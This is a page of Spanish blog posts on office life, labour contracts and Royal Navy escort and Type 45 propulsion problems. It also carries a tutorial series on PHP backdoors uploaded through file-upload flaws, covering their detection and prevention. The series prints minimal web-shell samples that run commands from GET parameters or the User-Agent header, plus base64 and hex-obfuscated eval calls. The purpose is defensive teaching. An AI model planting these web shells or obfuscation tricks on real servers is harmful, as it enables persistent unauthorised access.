Blog

LA EMPRESA: CUANDO LA OFICINA ES DEMASIADO PEQUEÑA

27.03.2018 20:53
 
¿Qué tan importante es el diseño de una oficina para crear un ambiente de trabajo agradable? 
 
No es época de destinar espacios muy grandes para pocas personas, la tendencia es la opuesta; por cuestiones económicas muchas veces se prefiere ahorrar en las instalaciones destinadas a los empleados.  Aquí puedo hacer una crítica porque muchos espacios que han sido pensado para que en ellos trabaje un determinado número de personas después se ven colmados de personal. Ahí además se reciben visitantes aumentando aún más el aforo. El ambiente se ve perjudicado por el desorden, la bulla y la falta de espacio, afectando la privacidad, la higiene y en no pocos casos la productividad.
 
Me refiero en particular al trabajo en una oficina tradicional, donde se cumple una jornada de unas nueve horas diarias. En estos casos se deben tener en cuenta la organización de la oficina y el mobiliario adecuado. Generalmente se opta por espacios sin mayores divisiones, por lo que habría que cuidar aún más que el número de empleados sea el que efectivamente pueda ser albergado en ese lugar.
 
El diseño de un espacio de oficinas debe ser encargado a un profesional o grupo de profesionales que se asegure de que las condiciones de comodidad y de seguridad e higiene sean adecuadas. A veces los niveles de ruido se vuelven intolerables, los artefactos electrónicos emiten niveles altos de radiación, los gérmenes pululan en el lugar, el aire termina viciado y la privacidad se vuelve totalmente inexistente. ¿Suena exagerado? No lo es.
 
Definitivamente hay que esmerarse en encontrar un espacio suficientemente amplio, organizado, ordenado, correctamente ventilado, con algún área privada donde se puedan discutir temas que involucren sólo a determinadas áreas de la empresa. Esto beneficiará a todos y facilitará el trabajo dentro de la organización, mejorando por ende el clima laboral. La idea es que el espacio no perjudique el ambiente de trabajo, por el contrario, que contribuya a un desempeño cómodo de los empleados.
 

IMPLICANCIAS DE LA FALTA DE BUQUES DE ESCOLTA QUE SUFRE LA ROYAL NAVY

27.03.2018 11:49
 
Según algunos trascendidos la presencia de submarinos rusos en el Atlántico Norte se habría decuplicado en los últimos siete años. Es imposible verificar esa cifra e incluso es posible que el período considerado haya sido elegido en función de la estadística que arroja pero hay muchos indicios de la creciente presencia de los submarinos de Putin en esas aguas. De hecho la presencia de aviones antisubmarinos de la OTAN en Gran Bretaña en momentos en que no hay ejercicios conjuntos es un hecho muy frecuente, aunque en honor a la verdad, también hubo alguna falsa alarma. Sea como fuere, el Reino Unido quedó sin aeronaves de patrullado marítimo cuando sus Nimrods fueron literalmente cortados en rodajas.
 
Con los submarinos rusos cerca de sus aguas (tal vez incluso en ellas), con un portaaviones que ya comenzó a navegar y otro que deberá hacerlo en los próximos años, la necesidad inglesa de buques de escolta se hace más fuerte. De por sí hoy por hoy un portaaviones corre el riesgo de convertirse en un blanco fácil con misiles como el balístico antinavío Dong-Feng 21 (denominación de la OTAN CSS-5 - Dong-Feng) de los chinos. No faltan quienes afirman que los Clase Queen Elizabeth se verían en graves apuros hasta en el caso de un ataque de saturación con misiles antinavío mucho más modestos. Cada portaaviones británico contará con 3 sistemas CIWS Phalanx, 4 cañones de 30mm y ametralladoras Miniguns y de propósito general. Poco, muy poco para semejantes buques.
 
El escasa autonomía y capacidad de armas de los F-35B tampoco contribuirán demasiado a mantener a un eventual enemigo alejado de los portaaviones. Además esos aviones tardarán en llegar, al menos en número suficiente. De ese modo el grueso de la responsabilidad de proteger a los portaaviones recaerá en los buques de escolta. La pregunta es ¿los británicos tienen una cantidad suficiente de los mismos en condiciones operativas? Las voces de alarma más fuertes en ese sentido provienen del propio Reino Unido y son cada vez más intensas. Parece haber razones muy serias para la estridencia.
 
Con los problemas de propulsión de los destructores Tipo 45, con la ya crónica falta de personal de la RN y con un nivel de canibalización galopante, el número de buques de escolta en condiciones operativo es increíblemente bajo. No repetiremos a la ligera las cifras que se manejan entre bastidores pero sin dudas son críticas. El tremendo rojo financiero de la Defensa británica no contribuye en nada a mejorar la situación. 
 
El Reino Unido de Gran Bretaña e Irlanda del Norte llevó adelante una  política de construcciones navales que benefició más a su industria que a su marina de guerra. Nos atreveríamos a decir que la segunda salió muy perjudicada por las decisiones tomadas en tal sentido. No nos interesa juzgar el porqué de las resoluciones que se fueron materializando. Sí queremos dejar en claro que el resultado final es un aparente fortalecimiento de la capacidad de proyección del poder militar británico pero que en la práctica sucede todo lo contrario. En un mundo inestable e imprevisible eso puede suponer el fin del Reino Unido como potencia militar de peso mundial. Si a eso le sumamos las fuertes dificultades financieras que tiene la Royal Navy y el Brexit podemos afirmar que esa decadencia no es una mera hipótesis sino que ya comenzó. Hoy está siendo dado de baja el portahelicópteros HMS Ocean, vendido a Brasil. Sólo la RAF mantiene una capacidad acorde a sus antecedentes históricos.  
 
Artículos relacionados:
 
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (VII) - PUERTAS TRASERAS (IV) - DETECCIÓN

26.03.2018 21:42
 
Durante una revisión de rutina o una que se haga porque se sospecha que hay una o más puertas traseras presente en el sistema, deben revisarse los archivos de registros en búsqueda de determinadas palabras como son, por ejemplo, los nombres de comandos. En un servidor Apache los archivos a inspeccionar serán access.txt y error.txt.
 
Otros archivos presentes en el servidor deberán ser revisados en búsqueda de funciones como eval() y assert() y de funciones que puedan ser usadas para ocultar código malicioso, por ejemplo str_rot13(); base64_decode() y gzinflate().
 
También será conveniente buscar archivos modificados después de determinada fecha. No se debe caer en la ingenuidad de revisar sólo los archivos *.php, el código puede estar oculto en cualquier extensión de archivo. Convendrá ser particularmente meticuloso con los archivos .htaccess ya que los mismos pueden modificar las extensiones de archivo que pueden ser ejecutadas como PHP, es decir, pueden hacer que archivos cuya extensión no sea *.php sean ejecutados como PHP.
 
La presencia de largas cadenas codificadas en cualquier archivo deberá llamar nuestra atención ya que esas cadenas pueden estar ocultando código malicioso.
 
Aún en los casos en que se haga un análisis automatizado de los archivos, será necesario hacer una revisión final manual ya que habrá falsos positivos y algún problema que a los programas de revisión se les pueda escapar.
 
Las medidas arriba descriptas son sólo algunas de las tantas que habrá que tomar. No es la finalidad de este artículo describirlas todas.
 
Artículo relacionado:
 

LA EMPRESA: LOS CONTRATOS VERBALES (DE PALABRA)

26.03.2018 20:20
 
La  relación laboral se inicia mediante un contrato de trabajo que es celebrado entre un empleador y un trabajador. En el mismo es oportuno dejar constancia de las condiciones y los beneficios económicos y otros que se otorgarán; cuando las partes están de acuerdo entonces se valida el contrato.
 
¿Pero qué pasa cuando este contrato se hace de manera verbal?  Si bien es válido, no tiene la formalidad del caso y cualquiera de las partes podría desistir. Es el caso del que he sido testigo, el contrato se hizo de manera verbal y a dos semanas de iniciar el contrato laboral el contratado desistió.  Siendo que la oferta de trabajo era para un puesto gerencial se daba por sobrentendido que la negociación por el puesto de confianza en cuanto a condiciones y sueldo había quedado resuelta y en firme. Se había hablado de los términos y fueron aceptados. Tras ello el contratado desistió, hecho que tomó a todos por sorpresa.
 
Como enseñanza podemos sacar que este tipo de contratos deben hacerse de manera escrita de modo que el contratado tenga la seguridad de que está registrado en la planilla de la empresa y de que ya goza de todos los beneficios laborales. Por otro lado lo firmado también le da tranquilidad al empleador ya que así sabe que la selección y evaluación de personal ha dado un resultado positivo y ya tiene cubierta una plaza. Como ya lo dijimos oportunamente: "Verba volant, scrīpta manent" (Las palabras vuelan, lo escrito queda). A algunos esta afirmación podrá parecerles un tanto injusta pero en nuestro ámbito latinomericano es así.
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (VI) - PUERTAS TRASERAS (III) - PREVENCIÓN

26.03.2018 06:54
 
Para prevenir la subida y uso de puertas traseras conviene poner en práctica todas las medidas que hemos descripto con anterioridad para la Inyección de comandos:
 
 
Muchas veces el administrador no querrá deshabilitar las funciones que permiten la ejecución de comandos porque los programas de administración remota de servidores se sirven de ellas o porque alguna de ellas es necesaria para el normal funcionamiento de una aplicación. En ese caso habrá que extremar el resto de las medidas de prevención.
 
También se deben tener en cuenta las medidas de prevención contra la subida de archivos peligrosos:
 
 
y las medidas de prevención contra la Inyección SQL que eventualmente describiremos en algún artículo posterior.
 
Por ahora tampoco hemos tocado el tema de la Iclusión remota de archivos aunque hoy por hoy no debería ser un problema muy común. De todos modos es bueno saber que también representa un riesgo en lo referente a que puede ser aprovechado a modo de puerta trasera.
 
En algunas circunstancias hasta la Escritura de archivos puede convertirse en un verdadero dolor de cabeza:
 
 
Las credenciales válidas robadas a un administrador también servirán para comprometer al servidor con una puerta trasera o será usadas a modo de puerta trasera. El pirata informático también podrá utilizar como puertas traseras funcionalidades olvidadas u ocultas o puertas traseras preinstaladas.
 
 

RESOLVER LOS PROBLEMAS DE PROPULSIÓN DE LOS DESTRUCTORES TIPO 45 DE LA RN COSTARÁ MÁS DE 225 MILLONES DE DÓLARES

23.03.2018 09:31
 
Finalmente los problemas de los destructores Tipo 45 británicos están siendo admitidos oficialmente y surgen más detalles sobre los mismos.
 
Así se supo que la empresa encargada de resolver los problemas será BAE Systems y que los trabajos costarán al contribuyente británco algo más de $ 225 millones de dólares. Las obras que se realizarán serán la segunda parte de un programa de dos fases llamado Proyecto Napier, cuyo objetivo es resolver de una vez por todas los problemas de propulsión de los destructores antiaéreos británicos. 
 
Las tareas implicarán el reemplazo de los dos generadores diésel con los que ya cuentan los buques y el agregado de un tercero. Esto obligará al corte de los cascos de las naves. 
 
Tal como muchos habían sugerido el problema de los generadores no es el único ni siquiera el principal causante del colapso de la propulsión de los Type 45 en aguas cálidas. Hay un componente adicional, "llamado intercooler-recuperator" en las turbinas de gas. Este componente toma el calor que produce el motor y lo usa para mejorar la eficiencia del sistema en general. Al redirigir esa energía a mantener las otras partes frías. El problema es que no funciona como estaba previsto. 
 
En definitva y para resumir, el primer destructor debería estar modificado en el año 2021. El costo de las modificaciones implicará más presión a una Royal Navy que ya sufre todo tipo de problemas finacieros y que enfrenta las consecuencias del Brexit y - al menos en parte - los del resurgimiento militar ruso. Según algunos analistas cualquier complicación en el Proyecto Napier podría llevar el rojo de la Defensa británica a niveles insostenibles.
 
Recordemos que los problemas de los Tipo 45 son tan serios que ya al menos en dos oportunidades todos estuvieron en puerto al mismo tiempo. En diciembre del 2017 informábamos que los seis destructores se encontraban en la base de Portsmouth. En julio del 2016 se había dado una situación similar. La clases "Daring" terminó siendo tan problemática como costosa.
 
Artículos relacionados:
 

LA EMPRESA: REFLEXIONES ANTE EL ÉXODO DE EMPLEADOS

22.03.2018 19:51
 
Los cambios siguen en la empresa en la que trabajo y las renuncias también, es que si se quiere conservar a los trabajadores se debe poner atención al trato que se les da y más aún cuando se les reconoce algún talento y la empresa puede resultar beneficiada con el mismo; entonces los jefes deben trabajar y lograr que sean los trabajadores los que quieran formar parte de la empresa.  
 
Los empleados - algunos de ellos muy buenos - presentan sus renuncias y a los jefes sólo les queda quejarse por estos hechos ante Recursos Humanos ya que después de una inversión de tiempo y preparación los deben dejar ir, afectando directamente al desarrollo de la empresa. Después de ver esto de cerca puedo decir por qué renuncian a sus puestos de trabajo:
 

    - Porque los cargan con demasiado trabajo (lo que a menudo los obliga a realizar jornadas muy largas).

    - No ven un buen líder en su jefe.

    - No les entregan el manual de funciones.

    - No les reconocen el trabajo bien realizado.

    - Los sueldos son bajos en comparación con el mercado.

    - El ambiente laboral dista de ser el óptimo.

 
Los empleadores deben darse cuenta de que los empleado no son máquina de trabajar: tiene necesidades, expectativas, aspiraciones, ilusiones y una vida que no comienza ni termina en la empresa. Si no se tienen en cuenta estos factores y sólo se ve el beneficio económico inmediato, a mediano y largo plazo la empresa se deteriorará en su capacidad e imagen. Es inútil llorar sobre la leche derramada, se cosecha lo que se siembra.
 
Artículos relacionados:
 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (V) - PUERTAS TRASERAS (II)

21.03.2018 08:24
 
El pirata informático podría recurrir a algo más complejo o menos común que una codificación Base64 para intentar ocultar la verdadera funcionalidad de su código. 
 
<?php 
function decodificar($hexadecimal){
 
//a continuación se divida la cadena hexadecimal, se convierte cada par de caracteres a su correspondiente carácter ASCII y se 
evalúa la cadena resultante como código PHP mediante la función eval(), lo que resultará en la ejecución del código.
 
for ($i=0; $i < strlen($hexadecimal)-1; $i+=2){ 
$cadena .= chr(hexdec($hexadecimal[$i].$hexadecimal[$i+1])); 
eval($cadena); 
 
decodificar('73797374656d28226c73202d6c6122293b')
// en Windows será: decodificar('73797374656d282264697222293b');  
?>
 
Si cambiamos el comentario y lo nombres de la función, variables y parámetros será difícil determinar qué es lo que hace el script:
 
<?php function principal($uno){for ($i=0; $i < strlen($uno)-1; $i+=2){$dos .= chr(hexdec($uno[$i].$uno[$i+1]));}eval($dos);}principal('73797374656d28226c73202d6c6122293b');?>
 
Este código además podría ser insertado en algún script ya existente, complicando aún más su detección.
 
En estos casos lo mejor será buscar la función eval() o en su defecto la función assert(), las cuales debería despertar sospechas por sí solas. (ver: geoestrategia.webnode.es/news/vulnerabilidades-de-aplicaciones-web-inyeccion-de-codigo-php-evaluado-dinamicamente-ii/).
 
Artículo relacionado:
 

 

VULNERABILIDADES DE APLICACIONES WEB: SUBIDA DE ARCHIVOS PELIGROSOS (IV) - PUERTAS TRASERAS (I)

19.03.2018 14:48
 
Sin duda subir una puerta trasera es lo primero que un pirata informático hará cuando encuentre una vulnerabilidad de subida de archivos peligrosos y por ende es bueno aprender a reconocerlas para eliminarlas cuanto antes. Será bueno hacer de la búsqueda manual de las mismas un acto de rutina (lo que no excluye otras medidas de seguridad, sólo las complementa).
 
Una puerta trasera es un script malicioso utilizado por un atacante con la intención de escalar y mantener el acceso persistente a una aplicación web ya comprometida. Un hacker puede instalar puertas taseras no solo con una vulnerabilidad de subida de archivos peligrosos  sino también al comprometer aplicaciones web utilizando técnicas como inyección SQL, inclusión remota de archivos, escritura de archivos o mediante credenciales válidas robadas a un administrador. El pirata informático también podrá utilizar como puertas traseras funcionalidades olvidadas  u ocultas (ver: geoestrategia.webnode.es/news/vulnerabilidades-de-aplicaciones-web-funcionalidades-olvidadas-y-funcionalidades-ocultas/).
 
En su forma más simple la puerta trasera puede ser algo así:
 
<?php system($_GET['comando']); ?>
 
aunque habitualmente habrá algún intento por disimular la verdera funcionalidad del código:
 
eval(base64_decode("c3lzdGVtKCdscyAtbGEnKTsNCg=="));
 
(en Linux)
 
eval(base64_decode("c3lzdGVtKCdkaXInKTs="));
 
(en Windows).
 
Obviamente se preferirá el método POST sobre el GET, pero el pirata informático también podría recurrir a algo así:
 
<?php system($_SERVER['HTTP_USER_AGENT']); ?>
 
ya que el agente de usuario (user agent) es muy fácil de manipular y de, en este caso, cambiar por un comando. 
 

LA EMPRESA: LOS CERTIFICADOS DE TRABAJO

16.03.2018 20:19
 
He sido testigo de la molestia que causó recibir un certificado de trabajo, la interesada decía que era un documento muy simple ya que sólo contenía los nombres y el período en el que laboró en la empresa. Lo cierto es que para una futura contratación algunos empleadores exigen sustentar no sólo los períodos trabajados sino también su experiencia y los puestos para los que ha sido contratado.
 
Está claro que en Perú el empleador está obligado a entregar un certificado laboral al personal cesado dentro de las 48 horas de terminada la relación laboral pero no está en la obligación de describir el puesto desempeñado ni su rendimiento y comportamiento. Sin embargo, el interesado podría solicitar un certificado más detallado y su pedido podría ser evaluado por el área de Recursos Humanos que si lo considera pertinente lo puede entregar, más aún cuando la persona que ha dejado de laborar a la empresa ha prestado servicios desempeñando un buen cargo.
 
Un certificado de trabajo no es determinante para conseguir un nuevo empleo, es una referencia que sumada a otros certificados, experiencia comprobada y una buena entrevista de trabajo podría abrir nuevas posibilidades y permitir estar frente a un nuevo empleador. Nada cuesta hacerle ese favor a un trabajador que se esmeró por cumplir con la empresa. 
 
<< 110 | 111 | 112 | 113 | 114 >>